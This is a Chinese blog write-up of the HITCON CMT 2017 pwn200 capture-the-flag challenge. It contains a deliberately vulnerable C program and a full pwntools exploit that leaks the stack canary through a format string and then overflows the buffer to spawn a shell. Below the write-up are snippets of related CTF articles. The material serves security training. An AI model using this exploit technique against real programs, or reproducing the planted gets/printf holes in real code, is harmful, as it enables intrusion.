HITCON CMT2017-pwn200-wp

最新推荐文章于 2023-09-11 00:06:11 发布
最新推荐文章于 2023-09-11 00:06:11 发布
阅读量562 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/113572713
版权

HITCON community 2017的一道pwn题

#include<stdio.h>
#include<stdlib.h>
void canary_protect_me(){
    system("/bin/sh");
}
int main(){
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stdin, 0LL, 1, 0LL);
    char buf[40];
    gets(buf);
    printf(buf);
    gets(buf);
    return 0;
}

编译开启Partial RELRO, Canary, NX

gcc -m32 -z lazy -z nonexecstack -fstack-protector -no-pie pwn200.c -o pwn200

在这里插入图片描述在这里插入图片描述
利用格式化字符串漏洞泄露canary的值, 通过栈溢出填充, 覆盖返回地址, 跳转到canary_protect_me()拿shell
调试, 断到main()开始
在这里插入图片描述
mov eax, gs: 0x14
mov DWORD PTR [ebp - 0xc], eax
是canary的读取和存放, canary放到[ebp - 0xc]中, 读取$ebp-0xc
在这里插入图片描述

断到printf(), 查看写入缓冲区后的栈数据
在这里插入图片描述
偏移量为15(从0开始数), 所以第一次写入字符串"%15$x"可以泄露canary, 再拿个canary_protect_me的虚拟地址
在这里插入图片描述
完整exp

from pwn import *
io = process('./pwn200')

io.sendline("%15$x")
canary = int(io.recv(), 16)
log.info("canary: 0x%x" % canary)

binsh = 0x80491a2
payload = "A" * 0x28 + p32(canary) + "A" * 0xc + p32(binsh)
io.sendline(payload)
io.interactive()

在这里插入图片描述

fa1c4
关注
专栏目录
HITCON2022--ctf驱动逆向题
m0_64973256的博客
12-28 1082
当用户传入0x222080的时候,驱动进入这个分支,如果数组byte_140013190里的8个值均为1,则会跳转到LABEL_21,很显然,这里验证的内容是dword_140003000的开头是否是hitcon,这说明这里会出现flag。于是经过一番倒腾测试,发现执行一个函数,只有最后一个函数能执行下去,能行,一定是顺序问题,经过又一番测试,得到最终测试顺序,这大概是某种保护手段,阻碍静态分析,真正的函数是运行中动态生成的(实测,异或这两轮的结果并不是可执行的代码)
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2871
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
HITCON_CMT_2017_pwn200
Starr
03-22 2022
文章目录1. 基本信息反汇编思路3. 调试4. exp源码 文件下载 1. 基本信息 file: $ file HITCON_CMT_2017_pwn200 HITCON_CMT_2017_pwn200: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=57aa663
攻防世界pwn200
qq_25044201的博客
01-17 278
因为学校放假再加上回家学车,学习进度耽搁一段时间。算了废话少说 来看题 用ida分析 发现与之前做的level3极其相似 但是没有给libc库,所以我们得安装LibcSearcher这个能根据你所给的函数来计算libc的版本,进而得到system和bin_sh的地址 这里是准备工作 这里是获取pwn200文件中的有用地址 这里通过write函数泄露write的真实地址(got表里的地址才是真是地址,通过write函数显示在标准输入上) 获得libc的基地址,然后计算system和bin_sh的
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 469
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
2017湖湘杯pwn200_wp_格式化字符串漏洞
aptx4869_li的博客
01-02 1608
本文是格式化字符串漏洞的利用,题目为2017年湖湘杯pwn200,题目文件 链接:https://pan.baidu.com/s/1geZAemZ 密码:b51f 0x0001 看文件类型为elf文件,用  binwalk  查看一下: 一个32位的文件,用IDA看看: main函数: sub_80485CD():
台灣駭客年會 HITCON CMT 2017 - 安全技术资料汇总(共3份).zip
02-06
Breaking_into_the_iCloud_Keychain.pdf CSCS_以技術力協助公民社會的初次嘗試.pdf 臺灣資安人才教育_Cybersecurity_Education_in_Taiwan.pdf
HITCON-Training-Writeup:https的简要说明
04-29
cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 逆向工程 静态分析 动态分析 开发 有用的工具 IDA PRO 广发银行 Pwntool 实验1-sysmagic 部分 编译,链接,组装 执行 ...
hitcon2023逆向 The Blade WP
最新发布
Sky_WF的博客
09-11 1208
hitcon2023CTF逆向题The Blade ,rust写的程序,萌新记录一下做题过程,程序还是比较复杂的,但关键就是找到有关flag的部分,其他shell命令可以不管
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1800
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
打卡第18天:HITCON 从门口到放弃
Griswold_t_cn的博客
01-17 362
今天绝对是抽风,打开HITCON的题,恩,看标题 留下点链接就当今天的成果吧 HITCON docker https://github.com/t3hp0rP/hitconDockerfile WP https://github.com/orangetw/My-CTF-Web-Challenges ...
2017 hitcon Ssrf_me 详解 (perl脚本中GET open漏洞及解析漏洞)
a3320315的博客
12-15 1895
0x01 源码 http://117.50.3.97:8004/ <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapesh...
[HITCON 2017]SSRFme
Sk1y的博客
01-14 1047
[HITCON 2017]SSRFme 文章目录[HITCON 2017]SSRFmepathinfo()函数payload参考文章 打开题目,就是源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_hea
HITCON-Training lab5(自己构造rop)
像初雪一样自由洒落
03-12 385
看到静态链接,一顿欣喜,直接ropchain生成,栈溢出找出来就ok啦?然后后来发现并没有那么简单。。。 ================================================================================================ 【一段小插曲】 做题的时候突然很奇怪,nx开启,堆栈不可执行,为什么可以执行pop这些指令...
HITCON-Training lab8(格式化字符串写漏洞)
像初雪一样自由洒落
03-28 349
还在补格式化字符串漏洞的知识,,,,看到这道题的时候,有点懵,,,因为发现218不会整,,,看官方writeup也不太行,,, 先知社区上有篇讲的就很好了,,,nice,用了四种方法(最后一种没看懂,,,),,,看完,BJDCTF那道r2t4终于也明白了,感天动地,,,今天就写下前三种方法的种种,,, 顺便计算下偏移,反正都会用到 偏移是7 方法一 最简单的...
HITCON-trainning&寒假做题记录
Peanuts
01-28 685
HITCON-trainning 2019.1.27 是一些好题目这几天准备重新做一遍预计两天之内完成现在做到lab7 题目地址:https://github.com/scwuaptx/HITCON-Training lab1 比较简单的逆向题这里就不贴代码了,就是一个疑惑解码 lab2 一个普通的int0x80的一个shellcode编写这里就不多讲了感觉没有什么 lab3 ret2sc 原理比...
writeup hitcon-ctf-2014/stkof
fuchuangbob的专栏
06-12 2194
writeup hitcon-ctf-2014/stkof题目: https://github.com/ctfs/write-ups-2014/tree/master/hitcon-ctf-2014/stkof 漏洞分析可参考: http://acez.re/ctf-writeup-hitcon-ctf-2014-stkof-or-modern-heap-overflow/ 使用pwntoo
[hitcon 2017]ssrfme 1
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值